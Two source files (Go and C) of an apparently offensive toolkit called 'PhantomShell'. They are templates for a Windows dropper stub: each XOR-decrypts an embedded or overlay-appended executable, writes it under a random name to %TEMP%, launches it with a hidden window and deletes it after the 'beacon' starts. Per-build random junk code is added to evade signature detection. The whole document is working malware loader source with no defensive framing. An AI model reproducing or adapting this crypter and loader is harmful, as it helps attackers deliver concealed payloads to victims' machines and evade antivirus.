File: go_beacon/stub.go
//go:build windows
// +build windows

// {{RANDOM_HEADER}}
// {{RANDOM_BUILD_ID}}

package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"io"
	"math/rand"
	"os"
	"os/exec"
	"path/filepath"
	"syscall"
	"time"
	"unsafe"
)

// ============================================================
// EMBEDDED PAYLOAD — filled by packer.py at build time
// ============================================================
var encPayload = []byte{ {{PAYLOAD_BYTES}} }
var xorKey     = []byte{ {{KEY_BYTES}} }
var buildSeed  = "{{BUILD_SEED}}"

// ============================================================
// LOGGER (same pattern as beacon.go — log to %TEMP%)
// ============================================================
var logWriter io.Writer

func initLog() {
	logPath := filepath.Join(os.TempDir(),
		fmt.Sprintf("ps_stub_%s.log", time.Now().Format("20060102_150405")))
	f, err := os.OpenFile(logPath, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0644)
	if err != nil {
		return
	}
	logWriter = f
	logf("[STUB] Log started — PID=%d", os.Getpid())
	logf("[STUB] Payload size: %d bytes, key size: %d bytes", len(encPayload), len(xorKey))
}

func logf(format string, args ...any) {
	msg := fmt.Sprintf("[%s] %s\n",
		time.Now().Format("15:04:05.000"),
		fmt.Sprintf(format, args...))
	if logWriter != nil {
		logWriter.Write([]byte(msg))
	}
}

// ============================================================
// RANDOM JUNK — unique dead code per build
// ============================================================
type {{JUNK_TYPE_1}} struct {
	id  uint64
	buf [{{JUNK_SIZE}}]byte
	tag string
}

type {{JUNK_TYPE_2}} struct {
	items []{{JUNK_TYPE_1}}
	hash  [32]byte
}

var _{{JUNK_VAR_1}} = func() uint32 {
	v := uint32({{JUNK_SEED}})
	for i := 0; i < {{JUNK_LOOP}}; i++ {
		v ^= v << 13; v ^= v >> 17; v ^= v << 5
	}
	return v
}()

var _{{JUNK_VAR_2}} = func() string {
	h := sha256.Sum256([]byte(buildSeed + hex.EncodeToString(xorKey)))
	return hex.EncodeToString(h[:{{JUNK_HASH}}])
}()

func {{JUNK_FUNC_1}}(b []byte) uint32 {
	var h uint32 = 0x{{JUNK_XOR}}
	for _, c := range b { h = h*31 + uint32(c) }
	return h
}

func {{JUNK_FUNC_2}}() {
	t := {{JUNK_TYPE_1}}{id: uint64(_{{JUNK_VAR_1}})}
	copy(t.buf[:], xorKey)
	_ = {{JUNK_FUNC_1}}(t.buf[:])
}

// ============================================================
// ENTRY POINT
// ============================================================
func main() {
	initLog()
	defer func() {
		if r := recover(); r != nil {
			logf("[STUB] PANIC: %v", r)
		}
		logf("[STUB] Exit")
	}()

	// Phase 1: Short random delay
	delay := {{DELAY_MIN}} + rand.Intn({{DELAY_RANGE}})
	logf("[STUB] Sleep %d seconds before unpack", delay)
	time.Sleep(time.Duration(delay) * time.Second)

	// Phase 2: XOR decrypt
	logf("[STUB] Decrypting payload...")
	payload := make([]byte, len(encPayload))
	for i := range encPayload {
		payload[i] = encPayload[i] ^ xorKey[i%len(xorKey)]
	}
	logf("[STUB] Decrypted %d bytes", len(payload))

	// Verify: first 2 bytes of a PE should be "MZ" (0x4D 0x5A)
	if len(payload) < 2 || payload[0] != 0x4D || payload[1] != 0x5A {
		logf("[STUB] ERROR: decrypted data is NOT a valid PE (no MZ header). First bytes: %02X %02X",
			payload[0], payload[1])
		return
	}
	logf("[STUB] PE header OK (MZ)")

	// Phase 3: Write to %TEMP%
	tmpDir := os.TempDir()
	exeName := randomName() + ".exe"
	exePath := filepath.Join(tmpDir, exeName)
	logf("[STUB] Writing to: %s", exePath)

	err := os.WriteFile(exePath, payload, 0644)
	if err != nil {
		logf("[STUB] ERROR writing file: %v", err)
		return
	}
	logf("[STUB] File written OK (%d bytes)", len(payload))

	// Phase 4: Execute
	logf("[STUB] Executing: %s", exePath)
	cmd := exec.Command(exePath)
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	err = cmd.Start()
	if err != nil {
		logf("[STUB] ERROR CreateProcess: %v", err)
		os.Remove(exePath)
		return
	}
	logf("[STUB] Process started — PID=%d", cmd.Process.Pid)

	// DON'T delete immediately — inner beacon has its own sleep phase.
	// Wait for the beacon to fully start, then clean up.
	time.Sleep(60 * time.Second)
	os.Remove(exePath)
	logf("[STUB] Cleanup done — exiting")
}

// ============================================================
// HELPERS
// ============================================================
func randomName() string {
	const chars = "abcdefghijklmnopqrstuvwxyz0123456789"
	b := make([]byte, {{NAME_LEN}})
	for i := range b { b[i] = chars[rand.Intn(len(chars))] }
	return string(b)
}

var _ = unsafe.Sizeof(0)

File: go_beacon/stub.c
// PhantomShell Overlay Stub (C)
// Minimal Windows stub that extracts and executes an XOR-encrypted EXE from its own overlay.
// Compiled with MinGW: gcc -s -mwindows -o stub.exe stub.c -luser32 -lshell32

#include <windows.h>
#include <stdio.h>

// XOR key (64 bytes) — replaced by packer at build time
static const unsigned char XOR_KEY[64] = { {{KEY_BYTES}} };

// -----------------------------------------------------------
// RANDOM JUNK (unique identifiers per build, dead code)
// -----------------------------------------------------------
static const char BUILD_ID[]  = "{{BUILD_ID}}";
static const int  JUNK_SEED   = {{JUNK_SEED}};
static const int  DELAY_MIN   = {{DELAY_MIN}};
static const int  DELAY_RANGE = {{DELAY_RANGE}};

static int junk_func(int x) {
    unsigned int v = (unsigned int)x ^ 0x{{JUNK_XOR}};
    for (int i = 0; i < {{JUNK_LOOP}}; i++) {
        v = v * 1103515245 + 12345;
    }
    return (int)(v & 0x7FFFFFFF);
}

static void junk_calc(void) {
    volatile int x = JUNK_SEED;
    for (int i = 0; i < {{JUNK_LOOP2}}; i++) {
        x = junk_func(x);
    }
}

// -----------------------------------------------------------
// Get random filename (lowercase + digits)
// -----------------------------------------------------------
static void rand_name(char *buf, int len) {
    static const char chars[] = "abcdefghijklmnopqrstuvwxyz0123456789";
    unsigned int seed = GetTickCount() ^ junk_func(JUNK_SEED);
    for (int i = 0; i < len; i++) {
        seed = seed * 1103515245 + 12345;
        buf[i] = chars[seed % (sizeof(chars) - 1)];
    }
    buf[len] = 0;
}

// -----------------------------------------------------------
// Simple log to %TEMP%
// -----------------------------------------------------------
static void log_msg(const char *msg) {
    char path[MAX_PATH];
    char line[512];
    SYSTEMTIME st;
    GetLocalTime(&st);

    GetTempPathA(sizeof(path), path);
    wsprintfA(path + lstrlenA(path), "ps_cstub_%04d%02d%02d_%02d%02d%02d.log",
              st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);

    wsprintfA(line, "[%02d:%02d:%02d.%03d] %s\r\n",
              st.wHour, st.wMinute, st.wSecond, st.wMilliseconds, msg);

    HANDLE h = CreateFileA(path, FILE_APPEND_DATA, FILE_SHARE_READ, NULL,
                           OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h != INVALID_HANDLE_VALUE) {
        DWORD written;
        WriteFile(h, line, lstrlenA(line), &written, NULL);
        CloseHandle(h);
    }
}

// -----------------------------------------------------------
// Entry point (WinMain — no console window)
// -----------------------------------------------------------
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR cmdLine, int nShow) {
    char msg[512];
    HANDLE hSelf;
    DWORD fileSize, payloadSize, read;
    char selfPath[MAX_PATH];
    unsigned char *encrypted, *decrypted;
    char tmpPath[MAX_PATH], tmpName[13];
    int i;
    int exitCode = 0;

    junk_calc(); // Reference random junk to prevent optimization removal

    wsprintfA(msg, "PID=%lu — Build: %s", GetCurrentProcessId(), BUILD_ID);
    log_msg(msg);

    // Phase 1: Random delay
    unsigned int tick = GetTickCount();
    int delay = DELAY_MIN + (tick % DELAY_RANGE);
    wsprintfA(msg, "Sleep %ds", delay);
    log_msg(msg);
    Sleep(delay * 1000);

    // Phase 2: Read encrypted payload from own overlay
    GetModuleFileNameA(NULL, selfPath, sizeof(selfPath));
    wsprintfA(msg, "Self: %s", selfPath);
    log_msg(msg);

    hSelf = CreateFileA(selfPath, GENERIC_READ, FILE_SHARE_READ, NULL,
                        OPEN_EXISTING, 0, NULL);
    if (hSelf == INVALID_HANDLE_VALUE) {
        log_msg("ERROR: cannot open self");
        return 1;
    }

    fileSize = GetFileSize(hSelf, NULL);
    if (fileSize < 8) {
        log_msg("ERROR: file too small");
        CloseHandle(hSelf);
        return 1;
    }

    // Read 8-byte payload size from end
    SetFilePointer(hSelf, -8, NULL, FILE_END);
    ReadFile(hSelf, &payloadSize, 8, &read, NULL);

    if (payloadSize == 0 || payloadSize > fileSize - 8) {
        wsprintfA(msg, "ERROR: bad payload size: %lu (file=%lu)", payloadSize, fileSize);
        log_msg(msg);
        CloseHandle(hSelf);
        return 1;
    }
    wsprintfA(msg, "Payload marker: %lu bytes", payloadSize);
    log_msg(msg);

    // Read encrypted payload
    SetFilePointer(hSelf, -(LONG)(8 + payloadSize), NULL, FILE_END);
    encrypted = (unsigned char *)HeapAlloc(GetProcessHeap(), 0, payloadSize);
    decrypted = (unsigned char *)HeapAlloc(GetProcessHeap(), 0, payloadSize);
    if (!encrypted || !decrypted) {
        log_msg("ERROR: malloc fail");
        CloseHandle(hSelf);
        return 1;
    }

    ReadFile(hSelf, encrypted, payloadSize, &read, NULL);
    CloseHandle(hSelf);

    // Phase 3: XOR decrypt
    wsprintfA(msg, "Decrypting %lu bytes...", payloadSize);
    log_msg(msg);
    for (i = 0; i < (int)payloadSize; i++) {
        decrypted[i] = encrypted[i] ^ XOR_KEY[i % sizeof(XOR_KEY)];
    }

    // Verify PE header (MZ)
    if (payloadSize < 2 || decrypted[0] != 'M' || decrypted[1] != 'Z') {
        wsprintfA(msg, "ERROR: bad PE header: %02X %02X", decrypted[0], decrypted[1]);
        log_msg(msg);
        return 1;
    }
    wsprintfA(msg, "PE OK (MZ) — %lu bytes", payloadSize);
    log_msg(msg);

    // Phase 4: Write to %TEMP%
    GetTempPathA(sizeof(tmpPath), tmpPath);
    rand_name(tmpName, {{NAME_LEN}});
    lstrcatA(tmpPath, tmpName);
    lstrcatA(tmpPath, ".exe");

    wsprintfA(msg, "Writing: %s", tmpPath);
    log_msg(msg);

    HANDLE hOut = CreateFileA(tmpPath, GENERIC_WRITE, 0, NULL,
                              CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hOut == INVALID_HANDLE_VALUE) {
        log_msg("ERROR: write fail");
        return 1;
    }
    WriteFile(hOut, decrypted, payloadSize, &read, NULL);
    CloseHandle(hOut);

    // Phase 5: Execute via ShellExecuteA (SW_HIDE)
    log_msg("Executing via ShellExecuteA...");
    HINSTANCE ret = ShellExecuteA(NULL, "open", tmpPath, NULL, NULL, SW_HIDE);

    if ((INT_PTR)ret <= 32) {
        wsprintfA(msg, "ERROR: ShellExecuteA returned %d", (int)(INT_PTR)ret);
        log_msg(msg);
        DeleteFileA(tmpPath);
        return 1;
    }
    wsprintfA(msg, "ShellExecuteA OK (ret=%d) — waiting 60s", (int)(INT_PTR)ret);
    log_msg(msg);

    Sleep(60000);
    DeleteFileA(tmpPath);
    log_msg("Cleanup done — exit");

    HeapFree(GetProcessHeap(), 0, encrypted);
    HeapFree(GetProcessHeap(), 0, decrypted);
    return 0;
}
